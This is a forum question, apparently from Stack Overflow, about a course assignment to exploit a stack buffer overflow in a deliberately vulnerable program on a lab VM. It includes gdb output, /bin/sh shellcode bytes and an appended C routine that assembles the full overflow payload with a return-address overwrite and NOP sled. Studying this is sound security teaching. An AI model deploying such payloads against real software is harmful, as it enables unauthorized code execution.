
So I am having to do a buffer overflow for an assignment and I feel like I am very close. I must note that my teacher has set up a VM for us to use in which, if we are able to get shellcode into the return address of the stack, it will execute there on the stack. I do not need to do a loop back into my buffer or any of that. I am of the understanding that the register I am wanting to overwrite and put my shellcode in is eip. I got that from the info here: https://greyhat.gatech.edu/wiki/index.php?title=Stack_Buffer_Overflow

I have figured out that if I fill my buffer, s1[64], with 72 characters, I can get a seg fault:

 Program received signal SIGSEGV, Segmentation fault.
 0x00000000 in ?? ()

And when I have gdb print out the value of the registers I get:

 ebx            0xb7fc8000       -1208188928
 esp            0xbffff600       0xbffff600
 ebp            0x0      0x0     
 esi            0x0      0
 edi            0x80484c0        134513856
 eip            0x0      0x0     <------ Clearly I've messed up eip

If I fill my buffer with one less character, i.e. 71, the program executes successfully, so I feel like 72 has to be a magic number somehow. So I then tried to fill s1 with 72 filler characters followed by my shellcode. I get a different segfault this time:

 Program received signal SIGSEGV, Segmentation fault.
 0x080486f5 in main () at badcopyTester2.c:61

and gdb reveals that eip is filled with 0x080486f5. Why/how did eip get this value? Shouldn't my shellcode be in there? Also, no matter what I put at the end of my 72 filler characters, eip is always filled with that same 0x080486f5. Both the input

 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

and

 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

give that exact same segmentation fault.

Again, I feel like I'm very close as I found how to get eip cleared but am stuck past that. Thanks for your help!

art3m1sm00n
  • Inspect the assembly code you want to hack. If there are gs or fs registers somewhere, the code is protected by canary mechanisms. – icbytes Mar 10 '15 at 18:01
  • Well I just copied the shellcode that my instructor used in another simple example in class, so I believe it should work as it did then – art3m1sm00n Mar 10 '15 at 18:05
  • And the code I am using to do the overflow was specifically written to be vulnerable to this attack – art3m1sm00n Mar 10 '15 at 18:26
  • And you are sure that you attempt to overwrite eip pushed on stack? – icbytes Mar 10 '15 at 20:11
  • @icbytes (I'm in the same class with the same issue.) Here's a link to what we're working with: https://www.dropbox.com/sh/jj83t77geqcaj1w/AADemQoUudjSeGgFqJscIj3ya?dl=0 – David Mar 13 '15 at 04:59
  • Which kernel is in use? – icbytes Mar 13 '15 at 07:54
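The following is an added example, not code from the question, the instructor's VM or the linked files. It builds the kind of payload the question describes ([filler][new return address][shellcode], 32-bit little-endian, with the offset 72 taken from the post) and runs two checks a practitioner does before sending it: that the shellcode is delivered as raw bytes rather than as the literal four-character text "\xeb", and that no byte of the payload is 0x00, since a string-copying sink such as strcpy() stops at the first NUL. The address 0xbffff600 is the esp value from the register dump; 0xbffff610 is a hypothetical target chosen only to show a NOP sled absorbing a small stack shift, and the function names are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 38-byte shellcode exactly as written in the post, both as the literal
 * text a terminal would receive if it were typed, and as raw bytes. */
static const char shellcode_text[] =
    "\\xeb\\x18\\x5e\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c"
    "\\xb0\\x0b\\x8d\\x1e\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\xe8\\xe3"
    "\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68";

static const unsigned char shellcode_bytes[] = {
    0xeb,0x18,0x5e,0x31,0xc0,0x88,0x46,0x07,0x89,0x76,0x08,0x89,0x46,0x0c,
    0xb0,0x0b,0x8d,0x1e,0x8d,0x4e,0x08,0x8d,0x56,0x0c,0xcd,0x80,0xe8,0xe3,
    0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
};

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Turn "\xHH" escape text into raw bytes; other characters (e.g. the 'A'
 * filler) pass through literally. Returns bytes written, or -1 on a malformed
 * escape or when the output buffer is too small. */
int decode_hex_escapes(const char *text, unsigned char *out, size_t outlen) {
    size_t n = 0;
    for (const char *p = text; *p; ) {
        if (p[0] == '\\' && p[1] == 'x' && p[2] && p[3]) {
            int hi = hexval(p[2]), lo = hexval(p[3]);
            if (hi < 0 || lo < 0 || n >= outlen) return -1;
            out[n++] = (unsigned char)((hi << 4) | lo);
            p += 4;
        } else {
            if (n >= outlen) return -1;
            out[n++] = (unsigned char)*p++;
        }
    }
    return (int)n;
}

/* Lay out [filler][saved-EIP overwrite][NOP sled][shellcode]. ret_offset is the
 * distance from the start of the buffer to the saved return address (72 in the
 * post); ret_addr is stored little-endian as a 32-bit x86 return address. */
int build_payload(size_t ret_offset, uint32_t ret_addr, size_t sled,
                  const unsigned char *sc, size_t sclen,
                  unsigned char *out, size_t outlen) {
    size_t total = ret_offset + 4 + sled + sclen;
    if (total > outlen) return -1;
    memset(out, 'A', ret_offset);
    out[ret_offset + 0] = (unsigned char)(ret_addr & 0xff);
    out[ret_offset + 1] = (unsigned char)((ret_addr >> 8) & 0xff);
    out[ret_offset + 2] = (unsigned char)((ret_addr >> 16) & 0xff);
    out[ret_offset + 3] = (unsigned char)((ret_addr >> 24) & 0xff);
    memset(out + ret_offset + 4, 0x90, sled);          /* 0x90 = x86 NOP */
    memcpy(out + ret_offset + 4 + sled, sc, sclen);
    return (int)total;
}

/* A string-copying sink stops at the first NUL: report its index, or -1 if the
 * payload is clean. */
int first_nul(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0) return (int)i;
    return -1;
}

/* Read back the little-endian value at ret_offset, i.e. what `ret` loads into EIP. */
uint32_t saved_eip_of(const unsigned char *buf, size_t ret_offset) {
    return (uint32_t)buf[ret_offset] | ((uint32_t)buf[ret_offset + 1] << 8) |
           ((uint32_t)buf[ret_offset + 2] << 16) | ((uint32_t)buf[ret_offset + 3] << 24);
}

int main(void) {
    unsigned char raw[256], payload[256];
    int n = decode_hex_escapes(shellcode_text, raw, sizeof raw);
    printf("typed as text: %zu characters; decoded: %d bytes\n",
           strlen(shellcode_text), n);

    /* Target the esp value from the dump: its low byte is 0x00, which truncates. */
    int len = build_payload(72, 0xbffff600u, 0, raw, (size_t)n, payload, sizeof payload);
    printf("ret=0x%08x, payload %d bytes, first NUL at index %d\n",
           saved_eip_of(payload, 72), len, first_nul(payload, (size_t)len));

    /* Hypothetical target inside a 32-byte NOP sled: no NUL anywhere. */
    len = build_payload(72, 0xbffff610u, 32, raw, (size_t)n, payload, sizeof payload);
    printf("ret=0x%08x, payload %d bytes, first NUL at index %d\n",
           saved_eip_of(payload, 72), len, first_nul(payload, (size_t)len));
    return 0;
}
```

Two things the run makes visible: the escape text is 152 characters but only 38 bytes once decoded, so typing it at a prompt delivers four ASCII characters per intended byte, and a return address whose low byte is 0x00 cannot be delivered through a string copy even though the rest of the payload is fine. Stack addresses also move between a gdb session and a plain run because of differing environment contents, which is the reason for padding the landing zone with NOPs rather than aiming at a single byte.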

0 Answers